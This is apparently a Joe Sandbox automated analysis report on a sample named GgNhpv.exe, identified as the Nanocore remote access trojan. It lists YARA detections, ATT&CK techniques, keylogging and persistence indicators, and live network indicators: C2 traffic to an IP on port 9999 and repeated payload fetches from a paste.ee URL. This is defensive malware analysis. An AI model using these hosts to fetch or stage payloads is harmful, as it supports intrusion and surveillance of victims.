Loading ...

Play interactive tourEdit tour

Analysis Report GgNhpv.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:224019
Start date:21.04.2020
Start time:00:49:30
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 13m 22s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:GgNhpv.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:31
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.evad.winEXE@37/43@6/3
EGA Information:
  • Successful, ratio: 40%
HDC Information:
  • Successful, ratio: 2.9% (good quality ratio 2.4%)
  • Quality average: 37.5%
  • Quality standard deviation: 20.5%
HCA Information:
  • Successful, ratio: 93%
  • Number of executed functions: 196
  • Number of non-executed functions: 15
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, WMIADAP.exe, MusNotifyIcon.exe
  • Excluded IPs from analysis (whitelisted): 40.127.240.158, 20.44.86.43, 2.18.68.82, 205.185.216.10, 205.185.216.42
  • Excluded domains from analysis (whitelisted): umwatson.trafficmanager.net, fs.microsoft.com, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, settingsfd-geo.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
  • Execution Graph export aborted for target GgNhpv.exe, PID 3744 because it is empty
  • Execution Graph export aborted for target wpasv.exe, PID 4404 because it is empty
  • Execution Graph export aborted for target wpasv.exe, PID 4684 because it is empty
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Nanocore
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1Registry Run Keys / Startup Folder1Process Injection12Web Service1Input Capture11System Time Discovery1Remote File Copy1Input Capture11Data Encrypted11Web Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaPowerShell2Hidden Files and Directories1Scheduled Task1Software Packing13Network SniffingSecurity Software Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumUncommonly Used Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesGraphical User Interface1Scheduled Task1Path InterceptionDisabling Security Tools1Input CaptureSystem Information Discovery13Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationRemote File Copy1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseCommand-Line Interface11System FirmwareDLL Search Order HijackingDeobfuscate/Decode Files or Information1Credentials in FilesVirtualization/Sandbox Evasion2Logon ScriptsInput CaptureData EncryptedStandard Cryptographic Protocol12SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationScheduled Task1Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information3Account ManipulationProcess Discovery2Shared WebrootData StagedScheduled TransferRemote Access Tools1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceMasquerading1Brute ForceApplication Window Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsStandard Non-Application Layer Protocol2Jamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskHidden Files and Directories1Two-Factor Authentication InterceptionRemote System Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelStandard Application Layer Protocol3Rogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionVirtualization/Sandbox Evasion2Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess Injection12Input PromptSystem Network Connections DiscoveryWindows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 0000001E.00000002.1158787988.0000000004409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1179468544.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1183711423.0000000003BA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000001E.00000002.1156120893.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1186719168.0000000005370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000001E.00000002.1158420771.0000000003400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1181971836.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4220, type: MEMORY
Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2072, type: MEMORY
Source: Yara matchFile source: 15.2.MSBuild.exe.5370000.5.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.MSBuild.exe.5370000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sampleShow sources
Source: GgNhpv.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 15.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
Source: 30.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]15_2_06BB141E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]15_2_06BB145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]15_2_06BB13B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]15_2_06BB13B3

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49753 -> 151.80.8.11:9999
Connects to a pastebin service (likely for C&C)Show sources
Source: unknownDNS query: name: paste.ee
Source: unknownDNS query: name: paste.ee
Source: unknownDNS query: name: paste.ee
Source: unknownDNS query: name: paste.ee
Source: unknownDNS query: name: paste.ee
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.5:49753 -> 151.80.8.11:9999
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /r/yaEzF HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /r/yaEzF HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /r/yaEzF HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /r/yaEzF HTTP/1.1Host: paste.eeConnection: Keep-Alive
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 104.18.49.20 104.18.49.20
Source: Joe Sandbox ViewIP Address: 104.18.48.20 104.18.48.20
Source: Joe Sandbox ViewIP Address: 104.18.48.20 104.18.48.20
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /r/yaEzF HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /r/yaEzF HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /r/yaEzF HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /r/yaEzF HTTP/1.1Host: paste.eeConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: paste.ee
Urls found in memory or binary dataShow sources
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmpString found in binary or memory: http://google.com
Source: GgNhpv.exe, 00000000.00000002.817723834.0000000002610000.00000004.00000001.sdmp, MSBuild.exe, 0000000F.00000002.1181971836.0000000002B50000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: GgNhpv.exeString found in binary or memory: http://secureteam.net/ErrorReporting.asmx
Source: GgNhpv.exeString found in binary or memory: http://secureteam.net/ErrorReporting.asmxY
Source: GgNhpv.exeString found in binary or memory: http://secureteam.net/webservices/$
Source: GgNhpv.exeString found in binary or memory: http://secureteam.net/webservices/CreateErrorReport
Source: GgNhpv.exeString found in binary or memory: http://secureteam.net/webservices/T
Source: GgNhpv.exeString found in binary or memory: http://secureteam.net/webservices/TU
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: GgNhpv.exe, 00000000.00000003.775478680.000000001B2CB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comhr
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a raw input device (often for capturing keystrokes)Show sources
Source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

E-Banking Fraud:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 0000001E.00000002.1158787988.0000000004409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1179468544.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1183711423.0000000003BA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000001E.00000002.1156120893.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1186719168.0000000005370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000001E.00000002.1158420771.0000000003400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1181971836.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4220, type: MEMORY
Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2072, type: MEMORY
Source: Yara matchFile source: 15.2.MSBuild.exe.5370000.5.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.MSBuild.exe.5370000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 0000000F.00000002.1186978223.0000000005400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1188156970.00000000061D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1186893874.00000000053D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1186233370.00000000050B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1186832328.00000000053B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1182142774.0000000002BE4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001E.00000002.1158787988.0000000004409000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.1186856992.00000000053C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1179468544.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1179468544.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.1187390172.0000000005CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001E.00000002.1156120893.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001E.00000002.1156120893.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.1186946814.00000000053F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1186346502.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1186719168.0000000005370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1186313236.00000000051B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1187296119.0000000005C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1187421494.0000000005CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.1187312590.0000000005CA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001E.00000002.1158420771.0000000003400000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.1184242562.0000000003E31000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MSBuild.exe PID: 4220, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: MSBuild.exe PID: 4220, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MSBuild.exe PID: 2072, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: MSBuild.exe PID: 2072, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.MSBuild.exe.5c90000.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.53d0000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.50b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.53f0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.53d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.5370000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.53c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.5c90000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.51b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.51b0000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.5400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.61d0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.53c0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.5cc0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.61d0000.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.5cd0000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.5370000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.53b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.51c0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.5cc0000.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.5ca0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.5ca0000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.5400000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.MSBuild.exe.51c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.MSBuild.exe.5cd0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 11993
Source: unknownProcess created: Commandline size = 11967
Source: unknownProcess created: Commandline size = 11993
Source: unknownProcess created: Commandline size = 11967
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 11967Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 11967
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A28A320_2_00007FF7F9A28A32
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A229640_2_00007FF7F9A22964
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A58E120_2_00007FF7F9A58E12
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A212F30_2_00007FF7F9A212F3
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A211F30_2_00007FF7F9A211F3
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A211500_2_00007FF7F9A21150
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A29A340_2_00007FF7F9A29A34
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A2BC1A0_2_00007FF7F9A2BC1A
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A30B990_2_00007FF7F9A30B99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_061D332415_2_061D3324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_061D46D315_2_061D46D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_061D42EB15_2_061D42EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0108E47115_2_0108E471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0108E48015_2_0108E480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0108BBD415_2_0108BBD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02B2978815_2_02B29788
